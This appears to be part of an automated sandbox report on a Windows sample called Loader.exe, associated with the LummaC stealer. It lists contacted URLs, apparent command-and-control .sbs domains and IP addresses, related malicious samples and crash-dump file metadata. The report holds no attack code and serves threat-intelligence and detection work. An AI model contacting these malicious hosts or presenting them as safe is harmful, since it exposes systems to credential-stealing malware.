                                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://allocatinow.sbs/Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQALoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://store.steampowered.com/account/cookiepreferences/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://store.steampowered.com/mobileLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://steamcommunity.com/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=englishLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://resinedyw.sbs:443/apiiLoader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=englLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://steamcommunity.com/profiles/76561199724331900/badgesLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • URL Reputation: malware
                                                                                                          unknown
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.21.33.249
                                                                                                          enlargkiw.sbsUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          172.67.173.224
                                                                                                          ehticsprocw.sbsUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          188.114.96.3
                                                                                                          drawwyobstacw.sbsEuropean Union
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          104.102.49.254
                                                                                                          steamcommunity.comUnited States
                                                                                                          16625AKAMAI-ASUStrue
                                                                                                          172.67.205.156
                                                                                                          resinedyw.sbsUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          172.67.140.193
                                                                                                          vennurviot.sbsUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          104.21.79.35
                                                                                                          condifendteu.sbsUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          104.21.8.37
                                                                                                          widdensmoywi.sbsUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          172.67.206.204
                                                                                                          sergei-esenin.comUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1532242
                                                                                                          Start date and time:2024-10-12 22:35:08 +02:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 5m 35s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:16
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:Loader.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.evad.winEXE@8/13@11/9
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 66.7%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 83%
                                                                                                          • Number of executed functions: 20
                                                                                                          • Number of non-executed functions: 190
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.65.92
                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target Loader.exe, PID 6972 because there are no executed function
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          TimeTypeDescription
                                                                                                          16:36:02API Interceptor4x Sleep call for process: Loader.exe modified
                                                                                                          16:36:04API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.21.33.249Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              CachemanTray_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                  172.67.173.224ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    188.114.96.3DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                    • touxzw.ir/sirr/five/fre.php
                                                                                                                    lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                                                                    10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.airgame.store/ojib/
                                                                                                                    Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.cc101.pro/59fb/
                                                                                                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • servicetelemetryserver.shop/api/index.php
                                                                                                                    bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.rtprajalojago.live/2uvi/
                                                                                                                    lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.serverplay.live/71nl/
                                                                                                                    sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.cc101.pro/0r21/
                                                                                                                    E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                                                                    • paste.ee/d/VO2TX
                                                                                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • filetransfer.io/data-package/fOmsJ2bL/download
                                                                                                                    104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    drawwyobstacw.sbsWintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    CachemanTray_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    vsYkceYJOX.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    vennurviot.sbsWintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.140.193
                                                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.140.193
                                                                                                                    ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.46.170
                                                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.140.193
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.46.170
                                                                                                                    CachemanTray_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.140.193
                                                                                                                    vsYkceYJOX.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                    • 104.21.46.170
                                                                                                                    SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                    • 172.67.140.193
                                                                                                                    steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    mathcucom.sbsWintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    CachemanTray_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    vsYkceYJOX.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    condifendteu.sbsWintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.141.136
                                                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.79.35
                                                                                                                    ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.79.35
                                                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.79.35
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.141.136
                                                                                                                    CachemanTray_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.79.35
                                                                                                                    vsYkceYJOX.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                    • 172.67.141.136
                                                                                                                    SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                    • 104.21.79.35
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    AeYgxx6XFk.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.6.157.70
                                                                                                                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    http://coin-have.c0mGet hashmaliciousUnknownBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    AeYgxx6XFk.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.6.157.70
                                                                                                                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    http://coin-have.c0mGet hashmaliciousUnknownBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    AeYgxx6XFk.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.6.157.70
                                                                                                                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    http://coin-have.c0mGet hashmaliciousUnknownBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    AeYgxx6XFk.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.53.8
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.6.157.70
                                                                                                                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    http://coin-have.c0mGet hashmaliciousUnknownBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.206.204
                                                                                                                    AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 23.44.156.65
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.102.49.254
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 23.64.208.64
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 23.42.205.249
                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 23.42.118.13
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.33.249
                                                                                                                    • 172.67.173.224
                                                                                                                    • 188.114.96.3
                                                                                                                    • 104.102.49.254
                                                                                                                    • 172.67.205.156
                                                                                                                    • 172.67.140.193
                                                                                                                    • 104.21.79.35
                                                                                                                    • 104.21.8.37
                                                                                                                    • 172.67.206.204
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.0409599350511907
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:+OFTG2KsUhY1yDfAQXIDcQzc6rcEqcw3M3+HbHggggS/Yy2rLhOyRxDfQLPF5rsn:xBKV0Nvw4cjGm5ySOzuiF2Z24IO8LQ
                                                                                                                    MD5:B37DF4681194381A9C7FBD334047FAD6
                                                                                                                    SHA1:7961062EB683FF64577791F649FCC9C5366EDFC0
                                                                                                                    SHA-256:331DE58736CA960B79E1C3A4B897F9E5DA7161D00FBF35884851DD53B62EFC1B
                                                                                                                    SHA-512:5EA52A9FBAD593E9D91257BDCBD154E1BFCEF35122B3F5F369D25A1779F34F49BC4FBA32AA3AADFABB8EE1E022E915FC13051F8AC7BCE206D0BE331E018FD87B
                                                                                                                    Malicious:true
                                                                                                                    Reputation:low
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.2.7.1.8.5.1.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.3.7.8.1.0.1.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.4.0.f.4.b.4.-.7.2.b.8.-.4.8.8.c.-.9.3.e.d.-.b.9.6.7.2.5.8.8.f.9.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.9.2.c.c.9.2.-.1.4.9.2.-.4.f.3.4.-.a.5.2.5.-.5.2.6.2.7.3.f.a.c.8.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.0.-.0.0.0.1.-.0.0.1.5.-.8.7.9.0.-.8.e.5.9.e.6.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.0.8.7.d.7.b.1.8.d.9.d.d.3.7.c.b.6.8.f.8.1.1.f.7.2.d.e.6.c.0.d.b.b.b.f.d.3.1.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:data
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.0461998141723694
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:rQU/Piq05RL5jGm5ySOzuiF2Z24IO8OQ:EU/ax5RL5jPfOzuiF2Y4IO8O
                                                                                                                    MD5:299F4C245BC20BC4AA5561BE262FD189
                                                                                                                    SHA1:6BCA8F5579E3B10BCB1CAFD6A955CD7FFFABC25A
                                                                                                                    SHA-256:ACCCE4E532E589AFDCE8DF6A7942541494D9EF4716796748287B19423F2F0B9E
                                                                                                                    SHA-512:F90870737D5159BD94AF981F587A81401FFB099D2351D4A210967C77ABDC3B31CEBE624E27B78376C55B609C55A379439A538BC7EE703034C346AED6847DA25E
                                                                                                                    Malicious:true
                                                                                                                    Reputation:low
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.4.9.2.4.7.6.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.5.9.8.7.2.6.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.e.7.d.1.5.c.-.7.3.5.5.-.4.1.c.e.-.b.0.9.f.-.9.8.a.3.3.d.5.0.d.9.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.9.0.5.9.2.c.-.9.8.3.0.-.4.1.0.a.-.8.e.2.3.-.0.c.d.b.f.7.b.f.0.9.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.0.-.0.0.0.1.-.0.0.1.5.-.8.7.9.0.-.8.e.5.9.e.6.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.0.8.7.d.7.b.1.8.d.9.d.d.3.7.c.b.6.8.f.8.1.1.f.7.2.d.e.6.c.0.d.b.b.b.f.d.3.1.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0./.
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
